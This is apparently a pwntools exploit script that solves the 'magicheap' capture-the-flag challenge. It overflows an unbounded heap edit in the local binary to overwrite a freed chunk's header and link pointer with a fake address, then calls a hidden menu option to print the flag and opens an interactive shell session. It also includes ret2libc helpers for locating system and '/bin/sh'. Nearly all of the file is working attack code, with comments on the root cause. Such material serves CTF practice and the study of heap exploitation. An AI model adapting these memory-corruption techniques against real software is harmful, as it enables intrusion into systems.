from
pwn
import
*
from
LibcSearcher
import
LibcSearcher
from
sys
import
argv
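def ret2libc(leak, func, path=''):
    """Derive libc base, ``system`` and a ``"/bin/sh"`` string from one leaked symbol.

    Args:
        leak: runtime address of ``func`` as observed in the target process.
        func: name of the libc symbol that ``leak`` belongs to.
        path: path to the target's libc. When empty, LibcSearcher is asked to
            identify the libc from ``(func, leak)``; otherwise the file at
            ``path`` is parsed with pwntools' ``ELF``.

    Returns:
        Tuple ``(base, system, binsh)`` of absolute addresses in the target.
    """
    if not path:
        # No local libc given: let LibcSearcher identify it from (func, leak).
        libc = LibcSearcher(func, leak)
        base = leak - libc.dump(func)
        system = base + libc.dump('system')
        binsh = base + libc.dump('str_bin_sh')
    else:
        libc = ELF(path)
        base = leak - libc.sym[func]
        system = base + libc.sym['system']
        # next() works on Python 2 and 3 generators alike; the generator's
        # ``.next()`` method, used originally, only exists on Python 2.
        binsh = base + next(libc.search('/bin/sh'))
    return (base, system, binsh)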
# Thin I/O helpers over the global tube ``p``. Every outgoing payload is
# coerced with str(), so callers may pass ints as well as strings.


def s(data):
    """Send ``data`` as-is (no trailing newline)."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for ``delim`` on the tube, then send ``data`` without a newline."""
    return p.sendafter(delim, str(data))


def sl(data):
    """Send ``data`` followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for ``delim`` on the tube, then send ``data`` plus a newline."""
    return p.sendlineafter(delim, str(data))


def r(num=4096):
    """Receive up to ``num`` bytes."""
    return p.recv(num)


def ru(delims, drop=True):
    """Receive up to and including ``delims``; the delimiter is dropped by default."""
    return p.recvuntil(delims, drop)


def uu64(data):
    """Unpack a short little-endian leak as u64, zero-padding it to 8 bytes."""
    return u64(data.ljust(8, '\0'))


def leak(name, addr):
    """Log ``addr`` under ``name`` in hex at success level."""
    return log.success('{} = {:#x}'.format(name, addr))
# Session setup: verbose tube logging, target metadata, then the live process.
context.log_level = 'DEBUG'
binary = './magicheap'
context.binary = binary

# Parse the static artefacts before spawning the target; checksec output is
# suppressed to keep the DEBUG log readable.
elf = ELF(binary, checksec=False)
# Hard-coded to the host's x86-64 libc, which is what a locally spawned
# target will load; adjust if the target ships its own libc.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)

p = process(binary)
def dbg():
    """Attach gdb to the running target ``p`` and block until the operator resumes."""
    gdb.attach(p)
    pause()
def create(size, content):
    """Drive menu option 1: allocate ``size`` bytes and fill them with ``content``.

    Each prompt is answered with sendlineafter, which waits for the prompt
    text and then sends the reply plus a newline. ``size`` is stringified by
    ``sla``; note the create path prompts with ``"heap:"`` (no spaces).
    """
    sla("choice :", "1")
    sla("Heap : ", size)
    sla("heap:", content)
def edit(idx, size, content):
    """Drive menu option 2: write ``size`` bytes of ``content`` into slot ``idx``.

    ``size`` is whatever the caller supplies; the binary evidently does not
    bound it to the slot's original allocation, which is what makes the
    out-of-bounds write later in this script possible. The edit path prompts
    with ``"heap : "`` (spaced), unlike create.
    """
    sla("choice :", "2")
    sla("Index :", idx)
    sla("Heap : ", size)
    sla("heap : ", content)
def delete(idx):
    """Drive menu option 3: free the allocation held in slot ``idx``."""
    sla("choice :", "3")
    sla("Index :", idx)
# Lay out three adjacent allocations (slots 0, 1, 2) and free the middle one.
create(300, 'a' * 300)
create(400, 'a' * 400)
create(500, 'a' * 500)
delete(1)

fake_chunk_addr = 0x6020b0

# 700 bytes are written into slot 0, which was allocated with only 300:
# the tail runs past slot 0 and lands on the freed slot 1's chunk header
# (0x1a1 matches its 400-byte request size with the in-use bit set) and
# the two link pointers that follow it. Root cause on the target side is
# the unbounded edit length; clamping writes to the allocation would stop it.
payload = ''.join([
    'b' * 0x130,
    p64(0),
    p64(0x1a1),
    p64(0),
    p64(fake_chunk_addr),
])
edit(0, 700, payload)

# Re-request the same size that was freed.
create(400, 'c' * 400)

# Menu choice 4869 replies with "Congrt !" and then the flag on its own line.
sla("choice :", 4869)
ru("Congrt !\n")
flag = ru("\n")
print(flag)
p.interactive()